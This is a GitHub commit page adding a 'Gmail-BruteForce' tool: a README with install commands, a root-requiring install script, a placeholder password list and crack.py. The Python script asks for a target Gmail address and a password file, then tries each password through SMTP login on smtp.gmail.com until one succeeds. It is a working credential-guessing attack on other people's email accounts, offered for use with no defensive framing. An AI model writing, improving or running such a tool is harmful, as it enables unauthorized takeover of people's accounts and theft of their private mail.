Skip to content

Commit

Permalink
Add files via upload
Browse files Browse the repository at this point in the history
  • Loading branch information
mrprogrammer2938 authored Jul 30, 2021
1 parent ea58a57 commit 79e8f5a
Show file tree
Hide file tree
Showing 4 changed files with 136 additions and 0 deletions.
32 changes: 32 additions & 0 deletions README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,32 @@
# Gmail-Brute Force
<hr>

This Programm Write by [Mr.nope](https://github.com/mrprogrammer2938)
<br>

```
.----..----..-. .-. .--. .-..-. .----. .---. .-. .-..-----..----. .----. .---. .---. .----..----.
| |--'} |__}} \/ { / {} \ { |} | ___ | {_} }} }}_}| } { |`-' '-'} |__} } |__}/ {-. \} }}_}| }`-'} |__}
| }-`}} '__}| { } |/ /\ \| }} '--.{___}| {_} }| } \ \ `-' / } { } '__} } '_} \ '-} /| } \ | },-.} '__}
`----'`----'`-' `-'`-' `-'`-'`----' `----' `-'-' `---' `-' `----' `--' `---' `-'-' `----'`----'
```
<br>


**Installing**
```
git clone https://github.com/mrprogrammer2938/Gmail-BruteForce
cd Gmail-BruteForce
bash install.sh
python3 crack.py
```


### [Mr.nope](https://github.com/mrprogrammer2938) Account...

[Instagram](https://instagram.com/mr.programmer2938)

[Pinterest](https://www.pinterest.com/mrprogrammer2938)
71 changes: 71 additions & 0 deletions crack.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,71 @@
#!/usr/bin/python3
# This Programm Write by Mr.nope
# Gmail-Brute Force v1.4.3
import os
import time
import sys
import platform
try:
import smtplib
from email.message import EmailMessage
except ImportError:
os.system("pip3 install smtplib")
import smtplib
from email.message import EmailMessage
try:
from colorama import Fore,init
init()
except ImportError:
os.system("pip3 install colorama")
system = platform.uname()[0]
End = '\033[0m'
Run_Err = "\nPlease, Run This Programm on Linux or MacOS!\n"
banner = Fore.GREEN + """
.----..----..-. .-. .--. .-..-. .----. .---. .-. .-..-----..----. .----. .---. .---. .----..----. """ + Fore.CYAN + " :)" + Fore.GREEN + """
| |--'} |__}} \/ { / {} \ { |} | ___ | {_} }} }}_}| } { |`-' '-'} |__} } |__}/ {-. \} }}_}| }`-'} |__}
| }-`}} '__}| { } |/ /\ \| }} '--.{___}| {_} }| } \ \ `-' / } { } '__} } '_} \ '-} /| } \ | },-.} '__}
`----'`----'`-' `-'`-' `-'`-'`----' `----' `-'-' `---' `-' `----' `--' `---' `-'-' `----'`----'
""" + End
def main():
os.system("printf '\033]2;Gmail-Brute Force\a'")
os.system("clear")
print(banner)
Addr = input("\nEnter Gmail Address: ")
time.sleep(0.35)
pass_file = input("\nEnter Passlist: ")
time.sleep(0.51)
passlist = open(pass_file,"r").read().split()
for Password in passlist:
try:
with smtplib.SMTP_SSL('smtp.gmail.com',465) as s:
s.login(Addr,Password)
print(f"Password: {Password} Found!")
except smtplib.SMTPAuthenticationError:
print(f"{Password} Not Found!")
time.sleep(1)
try1()
def try1():
try_to_exit = input("\npress Enter...")
if try_to_exit == '':
ext()
else:
ext()

This comment has been minimized.

Copy link
@silent69team

silent69team Nov 13, 2022

Hun

def ext():
print(Fore.GREEN + "Exiting..." + End)
sys.exit()
if __name__ == '__main__':
try:
try:
if system == 'Linux':
main()
else:
print(Run_Err)
sys.exit()
except KeyboardInterrupt:
print("\nCtrl + C")
print("\nExiting...")
sys.exit()
except EOFError:
print("\nCtrl + D")
print("\nExiting...")
sys.exit()
28 changes: 28 additions & 0 deletions install.sh
Original file line number Diff line number Diff line change
@@ -0,0 +1,28 @@
#!/usr/bin/env bash
# This Programm Write by Mr.nope
# Gmail-Brute Force v1.4.3
if [[ "$(id -u)" -ne 0 ]]; then
echo "
Please, Run This Programm as Root!"
exit 1
fi
function main() {
printf '\033]2;Gmail-Brute Force\a'
clear
echo "
Installing..."
chmod +x crack.py
sleep 2
apt install python
apt install python3
apt install python3-pip
pip3 install --upgrade pip
echo "
Finish ;)
Usage:
python3 crack.py
"
exit 1
}
main
5 changes: 5 additions & 0 deletions passlist.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
12345
54321
abc

... Please, enter passlist ;)

0 comments on commit 79e8f5a

Please sign in to comment.